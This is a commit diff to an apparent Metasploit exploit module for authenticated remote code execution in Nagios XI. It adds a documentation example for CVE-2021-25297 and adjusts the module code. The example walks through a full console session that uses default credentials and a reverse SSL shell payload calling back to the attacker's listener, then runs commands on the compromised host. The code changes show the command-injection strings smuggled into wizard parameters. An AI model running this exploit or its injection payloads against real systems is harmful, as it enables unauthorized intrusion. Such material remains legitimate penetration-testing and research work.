Add example for version 5.5.6 with CVE-2021-25297

2023-02-07 14:30:11 -05:00 · 2023-02-07 14:30:11 -05:00 · 52fa2e5be6
parent 489ab24876
commit 52fa2e5be6
2 changed files with 89 additions and 8 deletions
--- a/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
@ -369,3 +369,83 @@ meterpreter > pwd
 /usr/local/nagiosxi/html/config
 meterpreter >
 ```
+
+### CentOS7 Running NagiosXI 5.5.6 (Official OVA) - CVE-2021-25297
+```
+msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
+[*] Using configured payload cmd/unix/reverse_perl_ssl
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOSTS 192.168.104.18
+RHOSTS => 192.168.104.18
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RPORT 443
+RPORT => 443
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
+PASSWORD => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25297
+TARGET_CVE => CVE-2021-25297
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.104.2
+LHOST => 192.168.104.2
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 8443
+LPORT => 8443
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
+
+Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This includes signin
+                                              g the license agreement.
+   PASSWORD        nagiosadmin      no        Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          192.168.104.18   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
+                                              loit
+   RPORT           443              yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local m
+                                              achine or 0.0.0.0 to listen on all addresses.
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   TARGET_CVE      CVE-2021-25297   yes       CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      no        Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_perl_ssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.104.2    yes       The listen address (an interface may be specified)
+   LPORT  8443             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   CMD
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
+
+[*] Started reverse SSL handler on 192.168.104.2:8443 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI.
+[*] Target is Nagios XI with version 5.5.6.
+[+] The target appears to be vulnerable.
+[*] Sending the payload...
+[*] Command shell session 1 opened (192.168.104.2:8443 -> 192.168.104.18:58930) at 2023-02-07 14:27:41 -0500
+id
+uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
+whoami
+apache
+uname -a
+Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+```
--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@ -89,6 +89,9 @@ class MetasploitModule < Msf::Exploit::Remote
    datastore['FINISH_INSTALL']
  end

+  # Returns a status code an a error message on failure.
+  # On success returns the status code and an array so we
+  # can update the login_result and res_array variables appropriately.
  def handle_unsigned_license(res_array, username, password, finish_install)
    auth_cookies, nsp = res_array
    sign_license_result = sign_license_agreement(auth_cookies, nsp)
@ -128,12 +131,10 @@ class MetasploitModule < Msf::Exploit::Remote
      when 5 # The license agreement still needs to be signed
        login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
        return login_result, res_array unless (login_result == 0)
-
      end
    when 5 # The license agreement still needs to be signed
      login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
      return login_result, res_array unless (login_result == 0)
-
    end

    print_good('Successfully authenticated to Nagios XI.')
@ -212,7 +213,7 @@ class MetasploitModule < Msf::Exploit::Remote
    }
    # After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298
    # changes from address to ip_address
-    if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.5.7')
+    if @version <= Rex::Version.new('5.5.7')
      address_param = 'address'
    else
      address_param = 'ip_address'
@ -223,10 +224,10 @@ class MetasploitModule < Msf::Exploit::Remote
      url_params = url_params.merge({
        'nextstep' => 3,
        'wizard' => 'windowswmi',
-        'ip_address' => Rex::Text.rand_text_alpha(7..15),
-        'domain' => Rex::Text.rand_text_alpha(7..15),
-        'username' => Rex::Text.rand_text_alpha(7..20),
-        'password' => Rex::Text.rand_text_alpha(7..20),
+        'ip_address' => Array.new(4) { rand(256) }.join('.'),
+        'domain' => Rex::Text.rand_text_alphanumeric(7..15),
+        'username' => Rex::Text.rand_text_alphanumeric(7..20),
+        'password' => Rex::Text.rand_text_alphanumeric(7..20),
        'plugin_output_len' => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
      })
    # CVE-2021-25297 affects the switch configuration wizard.
@ -235,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
        'nextstep' => 3,
        'wizard' => 'switch',
        address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};",
-        'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alpha(7..15),
+        'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15),
        'scaninterfaces' => 'on'
      })
    # CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by